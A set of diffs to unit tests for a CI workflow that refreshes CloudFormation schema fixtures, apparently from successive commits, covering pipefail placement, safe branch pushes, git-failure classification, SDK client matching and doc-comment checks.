+      expect(teeAt, 'the tee\u2019d refresh is gone \u2014 this case guards nothing').toBeGreaterThan(-1);
+      expect(pipefailAt, 'no pipefail in the refresh step').toBeGreaterThan(-1);
+      expect(pipefailAt, 'pipefail is set AFTER the pipeline it must guard').toBeLessThan(teeAt);
+    });
+
+    it('gives every step that runs a pipeline a pipefail before it', () => {
+      // The generalisation of the defect above, so the next pipeline added to
+      // any step cannot reintroduce it silently.
+      for (const step of steps) {
+        const run = step.run;
+        if (!run) continue;
+        const pipeAt = run.search(/\S \| \S|\|\s*\n/);
+        if (pipeAt === -1) continue;
+        const at = run.indexOf('pipefail');
+        expect(at, `${step.name}: runs a pipeline with no pipefail`).toBeGreaterThan(-1);
+        expect(at, `${step.name}: pipefail is set after its first pipeline`).toBeLessThan(pipeAt);
+      }
     });
 
     it('fails the step when a push failure is NOT a lost race', () => {
@@ -279,9 +303,51 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       // green exit, or the daily job lands nothing forever while reporting
       // success.
       const publish = shellOf('Publish the refresh');
-      expect(publish).toContain('before_sha');
-      expect(publish).toMatch(/::error::/);
-      expect(publish).toMatch(/exit 1/);
+      // The RELATION, not the tokens. Inverting the comparison — so a real
+      // permission failure exits 0 and a real lost race exits 1, precisely the
+      // defect — left the token-presence form green, as did blanking the
+      // baseline entirely.
+      expect(publish).toMatch(/if \[ -n "\$\{now\}" \] && \[ "\$\{now\}" != "\$\{base_sha\}" \]; then/);
+      const raceAt = publish.search(/::warning::Could not push/);
+      const errAt = publish.search(/::error::Push to/);
+      expect(raceAt).toBeGreaterThan(-1);
+      expect(errAt).toBeGreaterThan(raceAt);
+      // The lost-race arm exits 0 INSIDE the moved-tip branch; the hard failure
+      // is the fall-through.
+      expect(publish.slice(raceAt, errAt)).toMatch(/exit 0/);
+      expect(publish.slice(errAt)).toMatch(/exit 1/);
+    });
+
+    it('takes the push baseline from the LOCAL base, not a remote read', () => {
+      // Reading the remote just before pushing samples it AFTER a concurrent
+      // human push, so the post-failure comparison finds the tip "unmoved" and
+      // calls a real lost race "not a lost race", exiting 1. The base the
+      // commit was built on is what a non-fast-forward is relative to.
+      const publish = shellOf('Publish the refresh');
+      expect(publish).toContain('base_sha=$(git rev-parse HEAD)');
+      const baseAt = publish.indexOf('base_sha=$(git rev-parse HEAD)');
+      const commitAt = publish.indexOf('git commit -m "chore(schemas): additional');
+      expect(commitAt).toBeGreaterThan(-1);
+      expect(baseAt, 'the baseline is captured after the commit it describes').toBeLessThan(
+        commitAt
+      );
+      expect(publish, 'the baseline is still read off the remote').not.toMatch(
+        /base_sha=\$\(git ls-remote/
+      );
+    });
+
+    it('guards the umbrella comment\u2019s PR link on the number having resolved', () => {
+      // The comment itself is deliberately unguarded — the list is worth posting
+      // even when the number lookup failed. What must be guarded is the LINK,
+      // which would otherwise read `pull/` and point at the repo's PR index.
+      const publish = shellOf('Publish the refresh');
+      const guardAt = publish.search(/if \[ -n "\$\{pr_number:?-?\}" \]/);
+      const linkAt = publish.indexOf('/pull/${pr_number}');
+      expect(guardAt, 'the PR link is emitted with no PR-number guard').toBeGreaterThan(-1);
+      expect(linkAt).toBeGreaterThan(-1);
+      expect(guardAt).toBeLessThan(linkAt);
+      // And the comment still fires outside that guard.
+      expect(publish.indexOf('${BACKFILL_UMBRELLA}')).toBeGreaterThan(linkAt);
     });
 
     it('pins the cross-file literals the shell greps for', () => {

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -95,21 +95,61 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
         .filter((l) => !/^\s*#/.test(l))
         .join('\n');
 
-    it('gates the refresh, the drift probe and the PR on NO open refresh PR', () => {
+    it('refreshes and probes drift UNCONDITIONALLY, gating only the publish', () => {
+      // Load-bearing since the job stopped skipping: an open PR must not stop
+      // the refresh, or every new AWS addition waits for that PR to merge —
+      // and the PR that stays open longest is the RED one, exactly the window
+      // where waiting costs most.
       for (const name of ['Refresh fixtures from the public schema bundle', 'Detect drift']) {
-        expect(byName(name).if).toBe("steps.open_pr.outputs.number == ''");
+        expect(byName(name).if).toBeUndefined();
       }
-      for (const name of ['Regenerate the derived artifacts', 'Open the refresh PR']) {
+      for (const name of ['Regenerate the derived artifacts', 'Publish the refresh']) {
         expect(byName(name).if).toBe("steps.drift.outputs.drifted == 'true'");
       }
     });
 
-    it('gates the skip comment on the OPPOSITE condition', () => {
-      // The polarity pair. Swapping these two is the mutation the text
-      // assertions could not see.
-      expect(byName('Note the skipped cycle on the open PR').if).toBe(
+    it('switches onto the open PR branch only when one is open', () => {
+      expect(byName("Switch to the open refresh PR's branch").if).toBe(
         "steps.open_pr.outputs.number != ''"
       );
+    });
+
+    it('pushes onto an open PR ADDITIVELY — never forcing over a human commit', () => {
+      const publish = shellOf('Publish the refresh');
+      expect(publish).toContain('${existing_branch}');
+      expect(publish).toMatch(/Skipping this cycle/);
+      // Sliced STRUCTURALLY, not matched on one line. The earlier assertion was
+      // `/force[^\n]*\$\{existing_branch\}/`, and the real push is
+      // line-continued — so the mutation it existed to catch (adding `--force`
+      // to the existing-branch push) put the two tokens on different lines and
+      // the test stayed green.
+      const armStart = publish.indexOf('if [ -n "${existing_branch');
+      // Indentation-agnostic: the YAML block scalar strips the common indent,
+      // so the `else` arrives at two spaces, not ten.
+      const armEnd = publish.slice(armStart).search(/\n\s*else\s*\n/) + armStart;
+      expect(armStart, 'existing-branch arm not found').toBeGreaterThanOrEqual(0);
+      expect(armEnd, 'existing-branch arm has no else').toBeGreaterThan(armStart);
+      expect(publish.slice(armStart, armEnd)).not.toContain('force');
+    });
+
+    it('posts the diagnosis, on a new PR and on an updated one alike', () => {
+      const publish = shellOf('Publish the refresh');
+      expect(publish).toContain('diagnose-schema-refresh.mjs');
+      // Generated BEFORE the commit: the comparison against the COMMITTED
+      // fixtures is the whole source of "AWS removed this in THIS refresh".
+      expect(publish.indexOf('diagnose-schema-refresh.mjs')).toBeLessThan(
+        publish.indexOf('git commit')
+      );
+      expect(publish).toContain('gh pr comment');
+      expect(publish).toContain('--body-file /tmp/pr-body.md');
+    });
+
+    it('folds new writable properties into the backfill umbrella without failing the job', () => {
+      const publish = shellOf('Publish the refresh');
+      expect(publish).toContain('gh issue comment');
+      // The PR is the load-bearing output; losing it because an issue comment
+      // failed would be the wrong trade, and the list is in the PR body too.
+      expect(publish).toMatch(/gh issue comment[\s\S]*?\|\|/);
     });
 
     it('keeps the drift probe between the refresh and the regeneration', () => {
@@ -121,7 +161,7 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
         order.indexOf('Regenerate the derived artifacts')
       );
       expect(order.indexOf('Regenerate the derived artifacts')).toBeLessThan(
-        order.indexOf('Open the refresh PR')
+        order.indexOf('Publish the refresh')
       );
     });
 
@@ -160,7 +200,7 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
     });
 
     it('pushes with an EXPLICIT token, since credentials are not persisted', () => {
-      const push = shellOf('Open the refresh PR');
+      const push = shellOf('Publish the refresh');
       expect(push).toContain('x-access-token:${GH_TOKEN}');
       // A bare `git push origin` would fail: the checkout persists no auth.
       expect(push).not.toMatch(/git push\s+origin\s/);
@@ -172,7 +212,7 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       // target is an anonymous URL). Git then expects the branch NOT to exist
       // — while `force` is set only when ls-remote proved it does — so the
       // push is rejected `(stale info)` in exactly the case it exists for.
-      const push = shellOf('Open the refresh PR');
+      const push = shellOf('Publish the refresh');
       expect(push).toContain('--force-with-lease=refs/heads/');
       expect(push).not.toMatch(/--force-with-lease(?!=)/);
     });
@@ -191,31 +231,34 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       expect(guard).not.toContain('--author');
     });
 
-    it('posts the skip note ONCE per PR, not once per daily cycle', () => {
-      // Unattended and daily: without the marker check a PR left open for a
-      // month collects thirty identical comments, which trains the reader to
-      // ignore the thread.
-      const note = shellOf('Note the skipped cycle on the open PR');
-      // The marker must reach the POSTED BODY, not merely be assigned. It
-      // appears once in the shell (the `marker=` line), so a `toContain` on
-      // the name alone stays green when `${marker}` is dropped from `--body`
-      // — which is exactly the regression (every run posts again).
-      expect(note).toMatch(/--body \\\n\s*"\$\{marker\}/);
-      expect(note).toContain('cdkd-schema-refresh-skip-note');
-      expect(note).toContain('set -euo pipefail');
-      // Captured into a variable rather than piped: `grep -q` closing the pipe
-      // makes SIGPIPE the pipeline status under `pipefail`, inverting the
-      // guard on a long thread.
-      expect(note).toMatch(/comments=\$\(gh pr view/);
-      expect(note).not.toMatch(/\|\s*grep -qF/);
-    });
 
     it('stamps the branch per DAY, matching the daily cadence', () => {
       // The branch name IS the cycle's identity. At a daily cadence a
       // month-granular stamp would make every run after the first in a month
       // collide with an existing branch, sending each one down the
       // force-with-lease recovery path for no reason.
-      expect(shellOf('Open the refresh PR')).toContain('date -u +%Y-%m-%d');
+      // Anchored on the CYCLE assignment and the branch it builds, not on any
+      // `date -u +%Y-%m-%d` in the step — the commit messages carry one too, so
+      // a regression of `cycle=` back to `%Y-%m` left the old assertion green.
+      const publish = shellOf('Publish the refresh');
+      expect(publish).toContain('cycle=$(date -u +%Y-%m-%d)');
+      expect(publish).toContain('branch="bot/cfn-schema-refresh/${cycle}"');
+    });
+
+    it('re-checks the PR is still OPEN before pushing onto its branch', () => {
+      // A squash merge with --delete-branch between the guard and the push
+      // would make the plain push RE-CREATE the deleted branch — an orphan ref
+      // with no PR, the class this repo has a dedicated hook for.
+      const publish = shellOf('Publish the refresh');
+      expect(publish).toContain('--json state');
+      expect(publish).toMatch(/!= "OPEN"/);
+    });
+
+    it('passes the refresh skip list to the diagnosis', () => {
+      // The flag existed and nothing passed it, so the "Not refreshed" section
+      // could never render in production.
+      expect(shellOf('Refresh fixtures from the public schema bundle')).toContain('/tmp/refresh.log');
+      expect(shellOf('Publish the refresh')).toContain('--skipped-log');
     });
 
     it('fails the open-PR guard closed rather than open on a gh error', () => {
@@ -252,11 +295,17 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
     expect(workflow).toContain(`branch="${BRANCH_PREFIX}`);
   });
 
-  it('skips the cycle when a refresh PR is already open, rather than pushing to it', () => {
-    // A human is expected to commit classifications onto the open branch; a bot
-    // push would race or destroy that work.
-    expect(workflow).toContain("steps.open_pr.outputs.number == ''");
+  it('UPDATES an open refresh PR rather than skipping the cycle', () => {
+    // This replaced a case asserting the opposite. Skipping was the original
+    // design, on the reasoning that a bot push would destroy a human's
+    // classification commits — but everything the job rewrites is derived and
+    // recomputed, and `bogusTolerated` is explicitly preserved across
+    // regeneration, so an additive push reflects that work rather than undoing
+    // it. Skipping cost most exactly where it hurt: a RED PR stays open
+    // longest, holding back every new AWS addition behind it.
     expect(workflow).toContain("steps.open_pr.outputs.number != ''");
+    expect(workflow).toContain('existing_branch');
+    expect(workflow).not.toContain('Note the skipped cycle');
   });
 
   /**

--- a/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
+++ b/tests/unit/scripts/cfn-schema-refresh-workflow.test.ts
@@ -476,27 +476,35 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
         ).toBe(false);
       }
 
-      // The GUIDANCE BODY must hand out these same filters. Nothing fenced a
-      // row's contents — only the key SET — so round 10 widened the workflow
-      // and left the rendered command naming three files of eleven: a red from
-      // one of the four uncovered family members printed a paste-able command
-      // that comes back GREEN. The report's own silence, inside the fix for it.
+      // The guidance's PASTE-ABLE COMMAND must be these same filters. Two
+      // rounds of this fence were too weak: comparing the key SET let round 10
+      // widen the workflow while the rendered command still named three files
+      // of eleven, and comparing a token SET over the whole row let a dropped
+      // `\\` pass — after which the pasted command runs ONE filter and comes
+      // back GREEN over a real red. So the block is parsed as a command.
       const guidance = CHECK_GUIDANCE['fixture-consumer-tests']!;
-      const inGuidance = guidance
-        .join('\n')
-        .split('\n')
-        .map((l) => l.replace(/\\$/, '').trim())
-        .filter((l) => l !== '' && !l.startsWith('```') && !l.startsWith('vp test run'));
-      for (const needle of filters) {
+      const open = guidance.indexOf('```bash');
+      const close = guidance.indexOf('```', open + 1);
+      expect(open, 'the guidance no longer carries a command block').toBeGreaterThan(-1);
+      expect(close, 'the command block is unterminated').toBeGreaterThan(open);
+      const command = guidance.slice(open + 1, close).map((l) => l.trim());
+      expect(command[0], 'the block does not start with the invocation').toBe('vp test run \\');
+
+      // Every line but the last continues, or the shell ends the command there.
+      const argLines = command.slice(1);
+      argLines.forEach((line, i) => {
+        const isLast = i === argLines.length - 1;
         expect(
-          inGuidance,
-          `the rendered command omits ${JSON.stringify(needle)} — it will come back green`
-        ).toContain(needle);
-      }
-      // And no EXTRA filter in the guidance either: one the workflow does not
-      // run is a command whose red the job never collected.
-      const guidanceFilters = inGuidance.filter((l) => !l.includes(' '));
-      expect(new Set(guidanceFilters)).toEqual(new Set(filters));
+          line.endsWith('\\'),
+          `line ${i + 2} of the command ${isLast ? 'must NOT' : 'must'} continue: ${JSON.stringify(line)}`
+        ).toBe(!isLast);
+      });
+
+      const guidanceFilters = argLines.map((l) => l.replace(/\s*\\$/, '').trim());
+      expect(
+        guidanceFilters,
+        'the pasted command and the workflow run different filters'
+      ).toEqual(filters);
 
       // And a filter matching NOTHING is a silent narrowing: vitest ignores a
       // non-matching positional when others match, so renaming a file removes
@@ -506,6 +514,17 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
           testFiles.some((f) => f.slice(REPO_ROOT.length + 1).includes(needle)),
           `filter ${JSON.stringify(needle)} matches no test file`
         ).toBe(true);
+      }
+    });
+
+    it('names every collected check in the operator runbook', () => {
+      // The last unfenced pair. `run_check` names are fenced against
+      // `CHECK_GUIDANCE`'s keys, so a fifth check is FORCED into the guidance —
+      // and was free to be left out of the page a maintainer actually opens
+      // when the PR arrives. The table is prose; nothing else reads it.
+      const runbook = readFileSync(join(REPO_ROOT, 'docs/schema-refresh-runbook.md'), 'utf8');
+      for (const check of Object.keys(CHECK_GUIDANCE)) {
+        expect(runbook, `the runbook does not name ${check}`).toContain(check);
       }
     });
 
@@ -569,7 +588,11 @@ describe('cfn-schema-refresh workflow (issue #2718)', () => {
       // The flag existed and nothing passed it, so the "Not refreshed" section
       // could never render in production.
       expect(shellOf('Refresh fixtures from the public schema bundle')).toContain('/tmp/refresh.log');
-      expect(shellOf('Diagnose what needs a decision')).toContain('--skipped-log');
+      // The SPACE form: `--skipped-log=...` is read too now, but the workflow
+      // writes the space form and a bare `toContain` accepted either — the
+      // sibling pins for `--nested-key-rc` and `--failed-checks` already
+      // require the space form and its variable.
+      expect(shellOf('Diagnose what needs a decision')).toMatch(/--skipped-log \S/);
     });
 
     it('fails the open-PR guard closed rather than open on a gh error', () => {

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -42,6 +42,7 @@ import {
   renderLiteral,
   buildSdkLag,
   CHECK_GUIDANCE,
+  classifyGitShowFailure,
   collectFixtureDeltas,
   loadDeclaredProperties,
   UNREADABLE,
@@ -928,16 +929,49 @@ describe('the failed-checks verdict', () => {
   });
 
   it('names a check it has no guidance for rather than staying silent', () => {
+    // HYPHENATED, deliberately. The first version of this case used
+    // `audit:something:check` — the one name in the file with no hyphen — so it
+    // passed the wrong guard and could not see that every real check name
+    // rendered as the rejection placeholder. A check with no guidance row has
+    // nothing else naming it, so it lost its name completely.
     const md = renderDiagnosis({
       removed: [],
       writableAdded: [],
       divergences: [],
-      failedChecks: ['audit:something:check'],
+      failedChecks: ['audit:some-new-thing:check'],
       skipped: [],
     });
     expect(md).not.toContain('additions only');
-    expect(md).toContain('audit:something:check');
+    expect(md).toContain('audit:some-new-thing:check');
     expect(md).toContain('no guidance');
+    expect(md, 'the heading went through the wrong guard').not.toContain('rejected');
+  });
+
+  it('renders every check the table knows, and every one the workflow runs', () => {
+    // A CLASS fence, because this is the third round in which a render site
+    // rejected the legitimate names it exists to show: fixture filenames, then
+    // check names. Driving the REAL name sets means a fourth site cannot be
+    // added with the wrong guard and stay green.
+    const workflow = readFileSync(
+      join(REPO_ROOT, '.github/workflows/cfn-schema-refresh.yml'),
+      'utf8'
+    );
+    const fromWorkflow = [...workflow.matchAll(/^\s*run_check (\S+)/gm)].map((m) => m[1]!);
+    const names = [...new Set([...Object.keys(CHECK_GUIDANCE), ...fromWorkflow])];
+    expect(names.length, 'no check names found — this case fences nothing').toBeGreaterThanOrEqual(4);
+    expect(
+      names.some((n) => n.includes('-')),
+      'no hyphenated name in the set — the case cannot see the defect it exists for'
+    ).toBe(true);
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [],
+      failedChecks: names,
+      skipped: [],
+    });
+    expect(md).not.toContain('rejected');
+    for (const name of names) expect(md, `${name} is not named`).toContain(name);
   });
 
   it('never renders "additions only" over a coverage check that FAILED', () => {
@@ -1567,6 +1601,56 @@ describe('collectFixtureDeltas', () => {
     expect(readCurrent, 'the sentinel fell through to the comparison').toBe(0);
   });
 
+  it('classifies real git failures: path-not-in-HEAD is new, the rest are unreadable', () => {
+    // Measured against real git output. `unknown revision` and `invalid object`
+    // are whole-REVISION failures — an unborn HEAD says
+    // `fatal: invalid object name 'HEAD'` — and matching them as "brand-new"
+    // made every fixture look new and the refresh look clean, the exact
+    // fail-open this classification closes. Neither can match a genuine
+    // path-not-in-HEAD, which says `does not exist in 'HEAD'`.
+    const dir = mkdtempSync(join(tmpdir(), 'cdkd-git-'));
+    try {
+      execFileSync('git', ['init', '-q', dir]);
+      // Unborn HEAD: a whole-revision failure, NOT a missing path.
+      const unborn = (() => {
+        try {
+          execFileSync('git', ['show', 'HEAD:anything'], { cwd: dir, encoding: 'utf8' });
+          return '';
+        } catch (e) {
+          return String((e as { stderr?: unknown }).stderr ?? '');
+        }
+      })();
+      expect(unborn, 'git no longer reports an unborn HEAD this way').not.toBe('');
+      // The CLASSIFICATION, not just what git prints: matching the
+      // whole-revision wording as "brand-new" is what made a broken repository
+      // render the refresh as clean.
+      expect(classifyGitShowFailure(unborn)).toBe(UNREADABLE);
+
+      // And the genuine path-not-in-HEAD, from a repo that HAS a commit.
+      writeFileSync(join(dir, 'seed.txt'), 'x');
+      execFileSync('git', ['-C', dir, 'add', 'seed.txt']);
+      execFileSync('git', ['-C', dir, '-c', 'user.email=t@e', '-c', 'user.name=t', 'commit', '-qm', 's']);
+      const missing = (() => {
+        try {
+          execFileSync('git', ['show', 'HEAD:nope.json'], { cwd: dir, encoding: 'utf8' });
+          return '';
+        } catch (e) {
+          return String((e as { stderr?: unknown }).stderr ?? '');
+        }
+      })();
+      expect(classifyGitShowFailure(missing)).toBeUndefined();
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  }, 60_000);
+
+  it('treats a git failure with no recognisable wording as unreadable', () => {
+    // ENOENT and ENOBUFS both surface with empty stderr — the safe direction is
+    // "could not read", never "brand-new".
+    expect(classifyGitShowFailure('')).toBe(UNREADABLE);
+    expect(classifyGitShowFailure('fatal: not a git repository')).toBe(UNREADABLE);
+  });
+
   it('skips a BRAND-NEW fixture silently, which is not the same thing', () => {
     // No committed side means nothing to compare, not something unreadable —
     // counting it would put every newly captured type in the warning list.
@@ -1639,5 +1723,39 @@ describe('collectFixtureDeltas', () => {
       { resourceType: 'AWS::Glue::Connection', properties: ['Settable'] },
     ]);
     expect(out.readOnlyAddedCount).toBe(1);
+  });
+});
+
+describe('the module\u2019s own doc comments', () => {
+  it('has no JSDoc block orphaned from its declaration', () => {
+    // Inserting a helper directly above a documented function detaches that
+    // function's docblock and silently re-points it at the new one. It happened
+    // three times in one session — twice caught by `--checkJs` reporting an
+    // implicit-any on a parameter that now had no `@param`, once only by
+    // review. A block followed by another block, or by a blank line, documents
+    // nothing.
+    const src = readFileSync(join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'), 'utf8');
+    const lines = src.split('\n');
+    const orphans: string[] = [];
+    let blockStart = -1;
+    let seenBlocks = 0;
+    for (let i = 0; i < lines.length; i++) {
+      if (lines[i]!.trim() === '/**') blockStart = i;
+      if (lines[i] !== ' */') continue;
+      seenBlocks += 1;
+      const body = lines.slice(blockStart, i).join('\n');
+      // The FILE header documents the module, and a `@typedef`-only block
+      // documents types rather than a declaration — neither attaches to
+      // anything and both are correct as they are.
+      const attaches = seenBlocks > 1 && !/@typedef/.test(body);
+      const next = lines[i + 1] ?? '';
+      if (attaches && (next.trim() === '' || next.trim() === '/**')) {
+        orphans.push(`line ${i + 2}: ${JSON.stringify(next)}`);
+      }
+    }
+    expect(orphans, 'a docblock is not attached to a declaration').toEqual([]);
+    // And the file really does carry docblocks — otherwise this passes on a
+    // file it never parsed.
+    expect(lines.filter((l) => l === ' */').length).toBeGreaterThan(20);
   });
 });

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -25,7 +25,14 @@
  */
 import { describe, it, expect } from 'vite-plus/test';
 import { execFileSync, spawnSync } from 'node:child_process';
-import { mkdtempSync, readFileSync, readdirSync, rmSync, writeFileSync } from 'node:fs';
+import {
+  cpSync,
+  mkdtempSync,
+  readFileSync,
+  readdirSync,
+  rmSync,
+  writeFileSync,
+} from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
@@ -2148,6 +2155,46 @@ describe('assertFixtureFloor', () => {
       }
       expect(out).toContain('no schema fixtures found');
       expect(out).not.toContain('Nothing in this refresh needs a decision');
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  }, 60_000);
+
+  it('compares against the SEAM directory, not the real committed fixtures', () => {
+    // Shipped UNPINNED last round on the grounds that a discriminating case
+    // needed a non-empty seam directory the floor would refuse. True, and it
+    // does not make it hard: copying the real fixtures clears the floor in one
+    // call and the whole case runs in about a second.
+    //
+    // With `committedOf` following the seam, git cannot resolve a path outside
+    // the repository and every fixture lands in "could not read". With the
+    // hard-coded path it resolves the REAL committed fixture and diffs it
+    // against scratch content — fabricating a removal, with a provider line
+    // number, for a property AWS never removed.
+    const dir = mkdtempSync(join(tmpdir(), 'cdkd-seam-'));
+    try {
+      cpSync(join(REPO_ROOT, 'tests/fixtures/cfn-schemas'), dir, { recursive: true });
+      const target = join(dir, 'AWS-S3-Bucket.json');
+      const fixture = JSON.parse(readFileSync(target, 'utf8'));
+      expect(fixture.properties, 'the anchor fixture no longer declares it').toContain('BucketName');
+      fixture.properties = fixture.properties.filter((x: string) => x !== 'BucketName');
+      writeFileSync(target, JSON.stringify(fixture, null, 2));
+
+      let out = '';
+      try {
+        out = execFileSync(
+          'node',
+          [join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs'), `--fixtures-dir=${dir}`],
+          { encoding: 'utf8' }
+        );
+      } catch (e) {
+        out = String((e as { stdout?: unknown }).stdout ?? '');
+      }
+      expect(out, 'a removal was fabricated from the real committed fixture').not.toContain(
+        'Properties AWS removed'
+      );
+      expect(out).not.toContain('BucketName');
+      expect(out).toContain('could not read');
     } finally {
       rmSync(dir, { recursive: true, force: true });
     }

--- a/tests/unit/scripts/diagnose-schema-refresh.test.ts
+++ b/tests/unit/scripts/diagnose-schema-refresh.test.ts
@@ -25,7 +25,7 @@
  */
 import { describe, it, expect } from 'vite-plus/test';
 import { execFileSync } from 'node:child_process';
-import { mkdtempSync, readFileSync, writeFileSync } from 'node:fs';
+import { mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
@@ -985,11 +985,37 @@ describe('the SDK-lag section', () => {
           installed: '3.0.0',
           latest: '3.0.0',
           behind: false,
+          matched: false,
         },
       ],
     });
-    expect(md).toContain("not the type's own");
+    expect(md).toContain('may not be the type\u2019s own');
     expect(md).not.toContain('ruled out here');
+  });
+
+  it('says "here" for a MATCHED client, however it is named', () => {
+    // The true positive the previous case could not see. Re-deriving the name
+    // test in the renderer made this row read "not the type's own" about
+    // `AWS::Events::Rule`'s only client — a live, applicable lag the reader was
+    // told to discount.
+    const md = renderDiagnosis({
+      removed: [],
+      writableAdded: [],
+      divergences: [{ ...divergence, resourceType: 'AWS::Events::Rule' }],
+      skipped: [],
+      sdkLag: [
+        {
+          resourceType: 'AWS::Events::Rule',
+          client: '@aws-sdk/client-eventbridge',
+          installed: '3.0.0',
+          latest: '3.1.0',
+          behind: true,
+          matched: true,
+        },
+      ],
+    });
+    expect(md).toContain('LIVE here');
+    expect(md).not.toContain('may not be');
   });
 
   it('rejects a version string that is not one', () => {
@@ -1016,7 +1042,7 @@ describe('clientsForType', () => {
     // lagging, which is true and says nothing about the finding. Most providers
     // import STS.
     expect(clientsForType('AWS::Glue::Connection', rows)).toEqual([
-      { client: '@aws-sdk/client-glue', version: '3.1.0' },
+      { client: '@aws-sdk/client-glue', version: '3.1.0', matched: true },
     ]);
   });
 
@@ -1031,14 +1057,14 @@ describe('clientsForType', () => {
       { client: '@aws-sdk/client-auto-scaling', version: '3.1045.0' },
     ];
     expect(clientsForType('AWS::AutoScaling::AutoScalingGroup', separated)).toEqual([
-      { client: '@aws-sdk/client-auto-scaling', version: '3.1045.0' },
+      { client: '@aws-sdk/client-auto-scaling', version: '3.1045.0', matched: true },
     ]);
     const route53 = [
       { client: '@aws-sdk/client-sts', version: '3.0.0' },
       { client: '@aws-sdk/client-route-53', version: '3.1.0' },
     ];
     expect(clientsForType('AWS::Route53::HostedZone', route53)).toEqual([
-      { client: '@aws-sdk/client-route-53', version: '3.1.0' },
+      { client: '@aws-sdk/client-route-53', version: '3.1.0', matched: true },
     ]);
   });
 
@@ -1046,8 +1072,50 @@ describe('clientsForType', () => {
     // An empty answer renders as an absent type, which the section calls
     // "UNKNOWN, not ruled out" — but silently narrowing to nothing would hide a
     // real lag behind a naming mismatch. Widening is the safe direction.
-    expect(clientsForType('AWS::Made::Up', rows)).toEqual(rows);
-    expect(clientsForType('', rows)).toEqual(rows);
+    const hedged = rows.map((r) => ({ ...r, matched: false }));
+    expect(clientsForType('AWS::Made::Up', rows)).toEqual(hedged);
+    expect(clientsForType('', rows)).toEqual(hedged);
+  });
+
+  it('settles a SINGLE-client provider even when the name test cannot', () => {
+    // The name test is a heuristic, and reading its failure as "wrong client"
+    // was a regression: 13 of the 134 registered types are served by a client
+    // not named after their service segment, and telling the reader to discount
+    // a live, applicable lag is the confident-wrong-answer direction. With one
+    // client there is nothing to disambiguate.
+    const one = [{ client: '@aws-sdk/client-eventbridge', version: '3.1.0' }];
+    expect(clientsForType('AWS::Events::Rule', one)).toEqual([
+      { client: '@aws-sdk/client-eventbridge', version: '3.1.0', matched: true },
+    ]);
+  });
+
+  it('hedges only where the provider really is ambiguous', () => {
+    // Measured over the real tree: name test 119, single-client arm 10,
+    // genuinely ambiguous 3 — a provider importing several clients, none named
+    // for the service. `AWS::Logs::LogGroup` is one of the three.
+    const ambiguous = [
+      { client: '@aws-sdk/client-cloudwatch-logs', version: '3.1.0' },
+      { client: '@aws-sdk/client-sts', version: '3.0.0' },
+    ];
+    expect(clientsForType('AWS::Logs::LogGroup', ambiguous).every((r) => !r.matched)).toBe(true);
+  });
+
+  it('agrees with the real tree: at most a handful of types stay ambiguous', () => {
+    // A floor AND a ceiling. Zero hedged rows would mean the flag stopped
+    // discriminating; a large number would mean the name test broke.
+    const map = mapTypesToProviderFiles(
+      readFileSync(join(REPO_ROOT, 'src/provisioning/register-providers.ts'), 'utf8')
+    );
+    let hedged = 0;
+    let settled = 0;
+    for (const [type, file] of map) {
+      const rows = sdkClientVersions(file, REPO_ROOT);
+      if (rows.length === 0) continue;
+      if (clientsForType(type, rows)[0]!.matched) settled++;
+      else hedged++;
+    }
+    expect(settled, 'the client match stopped resolving').toBeGreaterThan(100);
+    expect(hedged, 'more types went ambiguous than the measurement found').toBeLessThanOrEqual(6);
   });
 });
 
@@ -1068,11 +1136,28 @@ describe('buildSdkLag', () => {
       {
         resourceType: 'AWS::Glue::Connection',
         client: '@aws-sdk/client-glue',
+        // Carried through, never re-derived downstream: two sites computing the
+        // same predicate is how the renderer came to disagree with the narrower.
+        matched: true,
         installed: '3.1.0',
         latest: '9.9.9',
         behind: true,
       },
     ]);
+  });
+
+  it('carries a HEDGED flag through, so the renderer never has to re-derive it', () => {
+    const ambiguous = () => [
+      { client: '@aws-sdk/client-cloudwatch-logs', version: '3.1.0' },
+      { client: '@aws-sdk/client-sts', version: '3.0.0' },
+    ];
+    const rows = buildSdkLag(
+      [{ resourceType: 'AWS::Logs::LogGroup', bucket: 'no-sdk-member' }],
+      ambiguous,
+      lag
+    );
+    expect(rows.length).toBe(2);
+    expect(rows.every((r) => r.matched === false)).toBe(true);
   });
 
   it('emits ONE row per (type, client) however many divergences land on it', () => {
@@ -1121,11 +1206,17 @@ describe('the script end to end', () => {
   // against the real repo. Neither log carries a non-case divergence, so no
   // `npm view` runs and the cases stay offline.
   const SCRIPT = join(REPO_ROOT, 'scripts/diagnose-schema-refresh.mjs');
-  const run = (log: string): string => {
+  const run = (log: string, rc?: string): string => {
     const dir = mkdtempSync(join(tmpdir(), 'cdkd-diagnose-'));
-    const path = join(dir, 'nested-key.log');
-    writeFileSync(path, log);
-    return execFileSync('node', [SCRIPT, '--nested-key-log', path], { encoding: 'utf8' });
+    try {
+      const path = join(dir, 'nested-key.log');
+      writeFileSync(path, log);
+      const args = [SCRIPT, '--nested-key-log', path];
+      if (rc !== undefined) args.push('--nested-key-rc', rc);
+      return execFileSync('node', args, { encoding: 'utf8' });
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
